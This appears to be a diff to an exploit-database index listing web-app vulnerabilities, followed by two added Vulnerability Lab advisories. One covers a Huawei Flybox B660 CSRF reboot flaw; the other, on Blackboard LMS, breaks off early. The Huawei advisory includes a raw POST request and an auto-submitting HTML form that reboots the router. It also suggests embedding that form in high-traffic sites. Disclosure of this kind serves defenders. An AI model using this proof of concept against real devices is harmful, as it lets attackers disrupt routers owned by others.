5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0 5339,platforms/php/webapps/5339.php,"Nuked-klaN 1.7.6 - Multiple Vulnerabilities",2008-04-01,"Charles Fol",php,webapps,0
5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - SQL Injection",2008-04-01,DreamTurk,php,webapps,0
@ -20393,20 +20402,20 @@ id,file,description,date,author,platform,type,port
7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0 7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0
7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0 7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0
7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0 7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0
7631,platforms/php/webapps/7631.txt,"2Capsule - 'sticker.php id' SQL Injection",2009-01-01,Zenith,php,webapps,0 7631,platforms/php/webapps/7631.txt,"2Capsule - SQL Injection",2009-01-01,Zenith,php,webapps,0
7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)",2009-01-01,x0r,php,webapps,0 7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)",2009-01-01,x0r,php,webapps,0
7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0 7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - SQL Injection",2009-01-01,DaiMon,php,webapps,0
7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0 7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0
7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote Arbitrary .PHP File Upload",2009-01-01,Lo$er,php,webapps,0 7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Arbitrary File Upload",2009-01-01,Lo$er,php,webapps,0
7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0 7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - 'user.cfg' Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0
7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - Authentication Bypass",2009-01-01,DNX,php,webapps,0 7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - Authentication Bypass",2009-01-01,DNX,php,webapps,0
7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - 'newsid' Parameter SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7641,platforms/php/webapps/7641.txt,"PowerNews 2.5.4 - 'newsid' Parameter SQL Injection",2009-01-01,"Virangar Security",php,webapps,0
7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - (Authentication Bypass) SQL Injection",2009-01-01,"Virangar Security",php,webapps,0 7642,platforms/php/webapps/7642.txt,"PowerClan 1.14a - Authentication Bypass",2009-01-01,"Virangar Security",php,webapps,0
7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0 7644,platforms/php/webapps/7644.txt,"Built2Go PHP Link Portal 1.95.1 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0
7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0 7645,platforms/php/webapps/7645.txt,"Built2Go PHP Rate My Photo 1.46.4 - Arbitrary File Upload",2009-01-02,ZoRLu,php,webapps,0
7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-01-02,ahmadbady,php,webapps,0 7648,platforms/php/webapps/7648.txt,"phpskelsite 1.4 - Remote File Inclusion / Local File Inclusion / Cross-Site Scripting",2009-01-02,ahmadbady,php,webapps,0
7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection",2009-01-03,darkjoker,php,webapps,0 7650,platforms/php/webapps/7650.php,"Lito Lite CMS - Multiple Cross-Site Scripting / Blind SQL Injection",2009-01-03,darkjoker,php,webapps,0
7653,platforms/php/webapps/7653.txt,"Webspell 4 - (Authentication Bypass) SQL Injection",2009-01-03,anonymous,php,webapps,0 7653,platforms/php/webapps/7653.txt,"webSPELL 4 - Authentication Bypass",2009-01-03,anonymous,php,webapps,0
7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0 7657,platforms/php/webapps/7657.txt,"webSPELL 4.01.02 - 'id' Remote Edit Topics",2009-01-04,StAkeR,php,webapps,0
7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0 7658,platforms/php/webapps/7658.pl,"PNphpBB2 <= 12i - (ModName) Multiple Local File Inclusion",2009-01-04,StAkeR,php,webapps,0
7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0 7659,platforms/php/webapps/7659.txt,"WSN Guest 1.23 - 'Search' SQL Injection",2009-01-04,DaiMon,php,webapps,0
@ -20972,7 +20981,7 @@ id,file,description,date,author,platform,type,port
8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0 8647,platforms/php/webapps/8647.txt,"Battle Blog 1.25 - 'uploadform.asp' Arbitrary File Upload",2009-05-08,Cyber-Zone,php,webapps,0
8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0 8648,platforms/php/webapps/8648.pl,"RTWebalbum 1.0.462 - 'albumID' Blind SQL Injection",2009-05-08,YEnH4ckEr,php,webapps,0
8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0 8649,platforms/php/webapps/8649.php,"TinyWebGallery 1.7.6 - Local File Inclusion / Remote Code Execution",2009-05-08,EgiX,php,webapps,0
8652,platforms/php/webapps/8652.pl,"eggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0 8652,platforms/php/webapps/8652.pl,"EggBlog 4.1.1 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0
8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / Arbitrary File Upload",2009-05-11,ahmadbady,php,webapps,0 8653,platforms/php/webapps/8653.txt,"Dacio's Image Gallery 1.6 - Directory Traversal / Authentication Bypass / Arbitrary File Upload",2009-05-11,ahmadbady,php,webapps,0
8654,platforms/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0 8654,platforms/php/webapps/8654.txt,"openWYSIWYG 1.4.7 - Local Directory Traversal",2009-05-11,StAkeR,php,webapps,0
8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0 8655,platforms/php/webapps/8655.pl,"microTopic 1 - (Rating) Blind SQL Injection",2009-05-11,YEnH4ckEr,php,webapps,0
@ -24069,7 +24078,7 @@ id,file,description,date,author,platform,type,port
15254,platforms/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload",2010-10-15,saudi0hacker,php,webapps,0 15254,platforms/php/webapps/15254.txt,"KCFinder 2.2 - Arbitrary File Upload",2010-10-15,saudi0hacker,php,webapps,0
15270,platforms/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps,0 15270,platforms/asp/webapps/15270.txt,"Kisisel Radyo Script - Multiple Vulnerabilities",2010-10-17,FuRty,asp,webapps,0
15610,platforms/php/webapps/15610.txt,"Joomla! Component JE Ajax Event Calendar - SQL Injection",2010-11-25,ALTBTA,php,webapps,0 15610,platforms/php/webapps/15610.txt,"Joomla! Component JE Ajax Event Calendar - SQL Injection",2010-11-25,ALTBTA,php,webapps,0
15280,platforms/php/webapps/15280.html,"Travel Portal Script Admin Password Change - Cross-Site Request Forgery",2010-10-19,KnocKout,php,webapps,0 15280,platforms/php/webapps/15280.html,"Travel Portal Script - Cross-Site Request Forgery (Admin Password Change)",2010-10-19,KnocKout,php,webapps,0
15276,platforms/php/webapps/15276.txt,"411cc - Multiple SQL Injections",2010-10-18,KnocKout,php,webapps,0 15276,platforms/php/webapps/15276.txt,"411cc - Multiple SQL Injections",2010-10-18,KnocKout,php,webapps,0
15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - 'FCKeditor' Arbitrary File Upload",2010-10-18,"Kubanezi AHG",php,webapps,0 15277,platforms/php/webapps/15277.txt,"GeekLog 1.7.0 - 'FCKeditor' Arbitrary File Upload",2010-10-18,"Kubanezi AHG",php,webapps,0
15278,platforms/php/webapps/15278.txt,"Brooky CubeCart 2.0.1 - SQL Injection",2010-10-18,X_AviaTique_X,php,webapps,0 15278,platforms/php/webapps/15278.txt,"Brooky CubeCart 2.0.1 - SQL Injection",2010-10-18,X_AviaTique_X,php,webapps,0
@ -27297,7 +27306,7 @@ id,file,description,date,author,platform,type,port
25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple Parameter SQL Injection",2005-02-17,"Patrick Hof",php,webapps,0 25121,platforms/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple Parameter SQL Injection",2005-02-17,"Patrick Hof",php,webapps,0
25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 - ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0 25123,platforms/php/webapps/25123.txt,"TrackerCam 5.12 - ComGetLogFile.php3 fm Parameter Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",php,webapps,0
25125,platforms/php/webapps/25125.txt,"ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-02-19,"albanian haxorz",php,webapps,0 25125,platforms/php/webapps/25125.txt,"ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-02-19,"albanian haxorz",php,webapps,0
25126,platforms/php/webapps/25126.txt,"eggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,php,webapps,0 25126,platforms/php/webapps/25126.txt,"EggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,php,webapps,0
25127,platforms/php/webapps/25127.txt,"PMachine Pro 2.4 - Remote File Inclusion",2005-02-19,kc,php,webapps,0 25127,platforms/php/webapps/25127.txt,"PMachine Pro 2.4 - Remote File Inclusion",2005-02-19,kc,php,webapps,0
25138,platforms/hardware/webapps/25138.txt,"D-Link IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 25138,platforms/hardware/webapps/25138.txt,"D-Link IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0
25139,platforms/hardware/webapps/25139.txt,"Vivotek IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0 25139,platforms/hardware/webapps/25139.txt,"Vivotek IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",hardware,webapps,0
@ -28798,8 +28807,8 @@ id,file,description,date,author,platform,type,port
27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0 27106,platforms/php/webapps/27106.txt,"aoblogger 2.3 - create.php Unauthenticated Entry Creation",2006-01-17,"Aliaksandr Hartsuyeu",php,webapps,0
27107,platforms/php/webapps/27107.txt,"PHPXplorer 0.9.33 - action.php Directory Traversal",2006-01-16,liz0,php,webapps,0 27107,platforms/php/webapps/27107.txt,"PHPXplorer 0.9.33 - action.php Directory Traversal",2006-01-16,liz0,php,webapps,0
27109,platforms/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 - BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0 27109,platforms/php/webapps/27109.txt,"Phpclanwebsite 1.23.1 - BBCode IMG Tag Script Injection",2005-12-28,"kurdish hackers team",php,webapps,0
27110,platforms/php/webapps/27110.txt,"Eggblog 2.0 - blog.php id Parameter SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0 27110,platforms/php/webapps/27110.txt,"EggBlog 2.0 - 'id' Parameter SQL Injection",2006-01-18,alex@evuln.com,php,webapps,0
27111,platforms/php/webapps/27111.txt,"Eggblog 2.0 - topic.php message Parameter Cross-Site Scripting",2006-01-18,alex@evuln.com,php,webapps,0 27111,platforms/php/webapps/27111.txt,"EggBlog 2.0 - 'message' Parameter Cross-Site Scripting",2006-01-18,alex@evuln.com,php,webapps,0
27112,platforms/php/webapps/27112.txt,"SaralBlog 1.0 - Multiple Input Validation Vulnerabilities",2006-01-18,"Aliaksandr Hartsuyeu",php,webapps,0 27112,platforms/php/webapps/27112.txt,"SaralBlog 1.0 - Multiple Input Validation Vulnerabilities",2006-01-18,"Aliaksandr Hartsuyeu",php,webapps,0
27114,platforms/php/webapps/27114.txt,"WebspotBlogging 3.0 - 'login.php' SQL Injection",2006-01-19,"Aliaksandr Hartsuyeu",php,webapps,0 27114,platforms/php/webapps/27114.txt,"WebspotBlogging 3.0 - 'login.php' SQL Injection",2006-01-19,"Aliaksandr Hartsuyeu",php,webapps,0
27115,platforms/cgi/webapps/27115.txt,"Rockliffe MailSite 5.3.4/6.1.22/7.0.3 - HTTP Mail Management Cross-Site Scripting",2006-01-20,"OS2A BTO",cgi,webapps,0 27115,platforms/cgi/webapps/27115.txt,"Rockliffe MailSite 5.3.4/6.1.22/7.0.3 - HTTP Mail Management Cross-Site Scripting",2006-01-20,"OS2A BTO",cgi,webapps,0
@ -29189,7 +29198,7 @@ id,file,description,date,author,platform,type,port
27642,platforms/php/webapps/27642.txt,"AR-Blog 5.2 - print.php Cross-Site Scripting",2006-04-14,ALMOKANN3,php,webapps,0 27642,platforms/php/webapps/27642.txt,"AR-Blog 5.2 - print.php Cross-Site Scripting",2006-04-14,ALMOKANN3,php,webapps,0
27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 - Language.php File Inclusion",2006-04-15,rgod,php,webapps,0 27643,platforms/php/webapps/27643.php,"PHPAlbum 0.2.2/0.2.3/4.1 - Language.php File Inclusion",2006-04-15,rgod,php,webapps,0
27644,platforms/php/webapps/27644.txt,"PlanetSearch + - Planetsearchplus.php Cross-Site Scripting",2006-04-13,d4igoro,php,webapps,0 27644,platforms/php/webapps/27644.txt,"PlanetSearch + - Planetsearchplus.php Cross-Site Scripting",2006-04-13,d4igoro,php,webapps,0
27645,platforms/php/webapps/27645.txt,"PowerClan 1.14 - member.php SQL Injection",2006-04-13,d4igoro,php,webapps,0 27645,platforms/php/webapps/27645.txt,"PowerClan 1.14 - 'member.php' SQL Injection",2006-04-13,d4igoro,php,webapps,0
27646,platforms/php/webapps/27646.txt,"LifeType 1.0.3 - 'index.php' Cross-Site Scripting",2006-04-13,"Rusydi Hasan",php,webapps,0 27646,platforms/php/webapps/27646.txt,"LifeType 1.0.3 - 'index.php' Cross-Site Scripting",2006-04-13,"Rusydi Hasan",php,webapps,0
27647,platforms/php/webapps/27647.txt,"Papoo 2.1.x - print.php Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps,0 27647,platforms/php/webapps/27647.txt,"Papoo 2.1.x - print.php Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps,0
27648,platforms/php/webapps/27648.txt,"MODx CMS 0.9.1 - 'index.php' Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps,0 27648,platforms/php/webapps/27648.txt,"MODx CMS 0.9.1 - 'index.php' Cross-Site Scripting",2006-04-14,"Rusydi Hasan",php,webapps,0
@ -29506,10 +29515,10 @@ id,file,description,date,author,platform,type,port
28090,platforms/php/webapps/28090.txt,"Woltlab Burning Board 1.2/2.0/2.3 - report.php postid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 28090,platforms/php/webapps/28090.txt,"Woltlab Burning Board 1.2/2.0/2.3 - report.php postid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0
28091,platforms/php/webapps/28091.txt,"Woltlab Burning Board 1.2/2.0/2.3 - showmods.php boardid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0 28091,platforms/php/webapps/28091.txt,"Woltlab Burning Board 1.2/2.0/2.3 - showmods.php boardid Parameter SQL Injection",2006-06-22,"CrAzY CrAcKeR",php,webapps,0
28092,platforms/php/webapps/28092.txt,"MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection",2006-06-22,imei,php,webapps,0 28092,platforms/php/webapps/28092.txt,"MyBulletinBoard (MyBB) 1.0.x/1.1.x - 'usercp.php' SQL Injection",2006-06-22,imei,php,webapps,0
28093,platforms/php/webapps/28093.txt,"SoftBizScripts Dating Script 1.0 - featured_photos.php browse Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28093,platforms/php/webapps/28093.txt,"SoftBizScripts Dating Script 1.0 - 'featured_photos.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
28094,platforms/php/webapps/28094.txt,"SoftBizScripts Dating Script 1.0 - products.php cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28094,platforms/php/webapps/28094.txt,"SoftBizScripts Dating Script 1.0 - 'products.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
28095,platforms/php/webapps/28095.txt,"SoftBizScripts Dating Script 1.0 - 'index.php' cid Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28095,platforms/php/webapps/28095.txt,"SoftBizScripts Dating Script 1.0 - 'index.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
28096,platforms/php/webapps/28096.txt,"SoftBizScripts Dating Script 1.0 - news_desc.php id Parameter SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0 28096,platforms/php/webapps/28096.txt,"SoftBizScripts Dating Script 1.0 - 'news_desc.php' SQL Injection",2006-06-22,"EllipSiS Security",php,webapps,0
28097,platforms/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",php,webapps,0 28097,platforms/php/webapps/28097.txt,"Dating Agent 4.7.1 - Multiple Input Validation Vulnerabilities",2006-06-22,"EllipSiS Security",php,webapps,0
28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusion",2006-06-22,Shm,php,webapps,0 28098,platforms/php/webapps/28098.txt,"PHP Blue Dragon CMS 2.9.1 - Multiple Remote File Inclusion",2006-06-22,Shm,php,webapps,0
28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0 28101,platforms/php/webapps/28101.txt,"Custom Dating Biz 1.0 - Multiple Input Validation Vulnerabilities",2006-06-24,Luny,php,webapps,0
@ -36943,9 +36952,16 @@ id,file,description,date,author,platform,type,port
40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0 40997,platforms/php/webapps/40997.txt,"Splunk 6.1.1 - 'Referer' Header Cross-Site Scripting",2017-01-07,justpentest,php,webapps,0
40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0 40998,platforms/php/webapps/40998.txt,"My Link Trader 1.1 - Authentication Bypass",2017-01-07,"Ihsan Sencan",php,webapps,0
40999,platforms/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0 40999,platforms/php/webapps/40999.txt,"My PHP Dating 2.0 - 'path' Parameter SQL Injection",2017-01-09,"Ihsan Sencan",php,webapps,0
41027,platforms/php/webapps/41027.txt,"Dating Script 3.25 - SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
41001,platforms/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0 41001,platforms/php/webapps/41001.txt,"My PHP Dating 2.0 - 'id' Parameter SQL Injection",2017-01-09,"Sniper Pex",php,webapps,0
41002,platforms/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection",2017-01-09,v3n0m,php,webapps,0 41002,platforms/php/webapps/41002.txt,"Friends in War Make or Break 1.7 - 'imgid' Parameter SQL Injection",2017-01-09,v3n0m,php,webapps,0
41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - SQL Injection",2017-01-10,JaMbA,php,webapps,0 41004,platforms/php/webapps/41004.txt,"Starting Page 1.3 - 'linkid' Parameter SQL Injection",2017-01-10,JaMbA,php,webapps,0
41005,platforms/php/webapps/41005.txt,"Freepbx < 2.11.1.5 - Remote Code Execution",2016-12-23,inj3ctor3,php,webapps,0 41005,platforms/php/webapps/41005.txt,"Freepbx < 2.11.1.5 - Remote Code Execution",2016-12-23,inj3ctor3,php,webapps,0
41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0 41006,platforms/php/webapps/41006.txt,"WordPress Plugin WP Support Plus Responsive Ticket System 7.1.3 - Privilege Escalation",2017-01-10,"Kacper Szurek",php,webapps,0
41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0 41007,platforms/php/webapps/41007.html,"FMyLife Clone Script (Pro Edition) 1.1 - Cross-Site Request Forgery (Add Admin)",2017-01-10,"Ihsan Sencan",php,webapps,0
41009,platforms/php/webapps/41009.txt,"Starting Page 1.3 - 'category' Parameter SQL Injection",2017-01-11,"Ben Lee",php,webapps,0
41010,platforms/php/webapps/41010.txt,"My link trader 1.1 - 'id' Parameter SQL Injection",2017-01-11,"Dawid Morawski",php,webapps,0
41014,platforms/java/webapps/41014.txt,"Blackboard LMS 9.1 SP14 - Cross-Site Scripting",2017-01-09,Vulnerability-Lab,java,webapps,0
41017,platforms/hardware/webapps/41017.txt,"Huawei Flybox B660 - Cross-Site Request Forgery",2017-01-10,Vulnerability-Lab,hardware,webapps,0
41023,platforms/php/webapps/41023.txt,"Travel Portal Script 9.33 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0
41024,platforms/php/webapps/41024.txt,"Movie Portal Script 7.35 - SQL Injection",2017-01-11,"Ihsan Sencan",php,webapps,0

@ -0,0 +1,192 @@
Document Title:
===============
Huawei Flybox B660 - (POST Reboot) CSRF Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2025
Release Date:
=============
2017-01-10
Vulnerability Laboratory ID (VL-ID):
====================================
2025
Common Vulnerability Scoring System:
====================================
4.4
Product & Service Introduction:
===============================
The Huawei B660 has a web interface for configuration. You can use any web browser you like to login to the Huawei B660.
(Copy of the Homepage: http://setuprouter.com/router/huawei/b660/manual-1184.pdf )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a security flaw that affects the official Huawei Flybox B660 3G/4G router product series.
Vulnerability Disclosure Timeline:
==================================
2017-01-10: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Huawei
Product: Flybox - Router (Web-Application) B660 3G/4G
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A remote cross-site request forgery (CSRF) vulnerability has been discovered in the official Huawei Flybox B660 3G/4G router product series.
The security vulnerability allows remote attackers to submit special requests to the affected product which could lead reboot the Product.
The vulnerability is located in the `/htmlcode/html/reboot.cgi` and `/htmlcode/html/system_reboot.asp` file modules and `RequestFile`
parameter of the localhost path URL. Remote attackers are able to reboot any Huawei Flybox B660 via unauthenticated POST method request.
The security risk of the csrf web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 4.4.
Exploitation of the csrf web vulnerability requires a low privilege web-application user account and medium or high user interaction.
Successful exploitation of the vulnerability results in unauthenticated application requests and manipulation of affected or connected
device backend modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] /htmlcode/html/reboot.cgi
[+] /htmlcode/html/system_reboot.asp
Vulnerable Parameter(s):
[+] RequestFile
Software version of the modem:
1066.12.15.01.200
Hardware version of the modem:
WLB3TCLU
Name of the device:
B660
Hardware version of the router:
WL1B660I001
Software version of the router:
1066.11.15.02.110sp01
Proof of Concept (PoC):
=======================
The security vulnerability can be exploited by remote attackers without privilege web-application user account and with medium or high user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
--- PoC Session Logs ---
POST /htmlcode/html/reboot.cgi?RequestFile=/htmlcode/html/system_reboot.asp HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: localhost/htmlcode/html/system_reboot.asp
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
HTTP/1.1 200 OK
CACHE-CONTROL: no-cache
Content-Type: text/html
Content-Length: 364
<html><script src="http://cakecdn.info/ad_20160927.js?ver=1&channel=1" id="{6AF30038-1A5F-46F9-AE73-455BB857D493}"></script>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>replace</title>
<body>
<script language="JavaScript" type="text/javascript">
var pageName = '/';
top.location.replace(pageName);
</script>
</body>
</html>
Note: Attacker are able to reboot the device itself without being authenticated to it .
Also an Attacker can put an auto-submit javascript-generated form inside an high traffic website to compromise.
PoC: CSRF Exploit
<html>
<!-- CSRF PoC By SaifAllah benMassaoud -->
<body>
<form id="test" action="http://192.168.1.1/htmlcode/html/reboot.cgi?RequestFile=/htmlcode/html/system_reboot.asp" method="POST">
</form>
<script>document.getElementById('test').submit();</script>
</body>
</html>
Security Risk:
==============
The security risk of the cross site request forgery vulnerability in the Huawei Flybox B660 3G/4G router product series is estimated as medium. (CVSS 4.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research team] - SaifAllah benMassaoud - (http://www.vulnerability-lab.com/show.php?user=SaifAllahbenMassaoud)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Section: magazine.vulnerability-lab.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark
of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get a ask permission.
Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com

196
platforms/java/webapps/41014.txt Executable file
@ -0,0 +1,196 @@
Document Title:
===============
Blackboard LMS 9.1 SP14 - (Profile) Persistent Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1900
Release Date:
=============
2017-01-09
Vulnerability Laboratory ID (VL-ID):
====================================
1900
Common Vulnerability Scoring System:
====================================
4.2
Product & Service Introduction:
===============================
Blackboard Learn (previously the Blackboard Learning Management System), is a virtual learning environment and course management system
